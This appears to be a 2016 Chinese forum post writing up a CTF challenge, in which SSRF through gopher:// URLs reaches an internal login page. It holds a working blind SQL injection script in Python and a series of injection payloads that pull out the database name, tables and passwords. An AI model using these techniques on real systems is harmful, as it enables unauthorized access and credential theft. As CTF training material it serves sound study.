看论坛没啥干货,就拿以前写的东西充个数吧。
一个ctf题目
十分明显,大概服务端那里就是用php获取你提交的url,然后服务器去访问。ssrf,先扫存活ip段。
burp从1到254遍历一下就好了,发现.1这台机器也是开放的,166 也是。对166扫端口发现是80。
[Python] 纯文本查看 复制代码 #coding=utf-8
#ssrf盲注脚本工具
import requests
import string
chars = []
def getchars():
global chars
chars = list(string.ascii_lowercase)
for i in range(0, 10):
chars.append(str(i))
chars += ['@', '_', '.', '-', '\\', '']
return chars
def checklength():
for i in range(0,9):
req = requests.get('http://web5.08067.me//index.php?url=gopher%3a%2f%2f172.16.181.166%3a80%2f_POST+%2fadmin%2fwllmctf_login.php+HTTP%2f1.1%250d%250aHost%3a+172.16.181.166%250d%250aContent-Length%3a+75%250d%250aContent-Type%3a+application%2fx-www-form-urlencoded%250d%250a%250d%250ausername%3dadmin%27+and+(SELECT+length(database()))%3d'+ str(i) +'+and+%271%27%3d%271%26password%3d2333')
response = req.content
#print response
if 'error names' not in response:
#print response
print '数据库长度为' + str(i)
break
def checkdatabase(dblength):
reslut = ''
for i in range(0,dblength):
for char in chars:
req = requests.get("/index.php?url=gopher%3a%2f%2f172.16.181.166%3a80%2f_POST+%2fadmin%2fwllmctf_login.php+HTTP%2f1.1%250d%250aHost%3a+172.16.181.166%250d%250aContent-Length%3a+80%250d%250aContent-Type%3a+application%2fx-www-form-urlencoded%250d%250a%250d%250ausername%3dadmin%27+and+(select+mid((database())%2c1%2c1))%3d%27"+ char +"%27+and+%271%27%3d%271%26password%3d2333")
response = req.content
print response
#print response
if 'error names' not in response:
#print response
reslut += char
print reslut
break
def checkdata():
getchars()
reslut = ''
for i in range (1, 33):
for char in chars:
#print char
url = "http://web5.08067.me/index.php?url=gopher%3a%2f%2f172.16.181.166%3a80%2f_POST+%2fadmin%2fwllmctf_login.php+HTTP%2f1.1%250d%250aHost%3a+172.16.181.166%250d%250aContent-Length%3a+107%250d%250aContent-Type%3a+application%2fx-www-form-urlencoded%250d%250a%250d%250ausername%3dadmin%27+and+(select+mid(((select+password+from+ssrf+limit+0%2c1))%2c"+ str(i) +"%2c1))%3d%27"+ char +"%27+and+%271%27%3d%271%26password%3d2333"
req = requests.get(url)
response = req.content
#print response
if 'password error' in response:
reslut += char
print reslut
break
if __name__ == '__main__':
checkdata()
#checklength()
#checkdatabase(8)
gopher笔记
某个登录 burp抓包
对其抓post包
POST /admin/wllmctf_login.php HTTP/1.1
Host: 172.16.181.166
Content-Length: 35
Content-Type: application/x-www-form-urlencoded
username=ss&password=xiaozhang123
(去掉了一些ua头,cookie 之类的,为了简单)
写构造gopher 把换行换成%0d%0a
gopher://172.16.181.166:80/_POST/admin/wllmctf_login.php HTTP/1.1%0d%0aHost: 172.16.181.166%0d%0aContent-Length: 35%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0a%0d%0ausername=admin&password=xiaozhang123
随便写点东西,上传图片好麻烦。不想写了
对了密码是注入出来的,盲注,先注入处表名,列名,在注入出内容,可以参考下面的payload来改写上面的py代码
POST /wllmctf_login.php HTTP/1.1
Host: 172.16.181.166
User-Agent: curl/7.43.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
log=admin&pwd=12345
gopher://172.16.181.166:80/_POST /wllmctf_login.php HTTP/1.1%0d%0aHost: 172.16.181.166%0d%0aUser-Agent: curl/7.43.0%0d%0aAccept: */*%0d%0aAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3%0d%0aAccept-Encoding: gzip, deflate%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0aContent-Length: 117
gopher%3A%2f%2f172.16.181.166%3A80%2f_%250aPOST%2520%2Fadmin%2fwllmctf_login.php%2520HTTP%252f1.1%250d%250aHost%253a%2520127.0.0.1%250d%250aContent-Length%253a%252035%250a%250aContent-Type%253A%2520application%252fx-www-form-urlencoded%250d%250a%250d%250ausername%253dss%2526password%253dxiaozhang123
gopher%3a%2f%2f172.16.181.166%3a80%2f_%250aPOST%2520%2fadmin%2fwllmctf_login.php%2520HTTP%252f1.1%250d%250aHost%253a%2520127.0.0.1%250d%250aContent-Length%253a%252035%250d%250aContent-Type%%253a%2520application%252fx-www-form-urlencoded%250d%250a%250d%250ausername%3dss%26password%3dxiaozhang123
gopher://172.16.181.166:80/_POST /admin/wllmctf_login.php HTTP/1.1%0d%0aHost: 172.16.181.166%0d%0aContent-Length: 52%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0a%0d%0ausername=admin’xor sleep(20)#&password=xiaozhang123
username=admin’and 1=1#&password=xiaozhang123
username=admin’ and ‘1’=’1&password=xiaozhang123
username=admin
‘ and (select LENGTH(database()))=4#
username=admin’ and ‘1’=’1&password=xiaozhang123
username=admin’ and ‘1’=’1&password=xiaozhang123
username=admin’ and (SELECT length(database()))=4 and ‘1’=’1&password=2333
username=admin’ and (SELECT length(database()))=4 and ‘1’=’1&password=2333
&password=233
database 长度为7
username=admin’ and (SELECT length(database()))=4 and ‘1’=’1&password=2333
database名字
wllmctf
username=admin’ and (select mid((database()),1,1))=’t’ and ‘1’=’1&password=2333
table名字
ssrf
username=admin’ and (select mid(((select table_name from information_schema.tables where table_schema=database() limit 0,1)),1,1))=’m’ and ‘1’=’1&password=2333
列名字
username
password
username=admin’ and (select mid(((select column_name from information_schema.columns where table_name=0x73737266 limit 0,1)),1,1))=’m’ and ‘1’=’1&password=2333
内容
username=admin’ and (select mid(((select password from ssrf limit 0,1)),1,1))=’m’ and ‘1’=’1&password=2333
| 
发表于 2016-11-16 11:41:30
发表于 2016-11-16 14:26:16
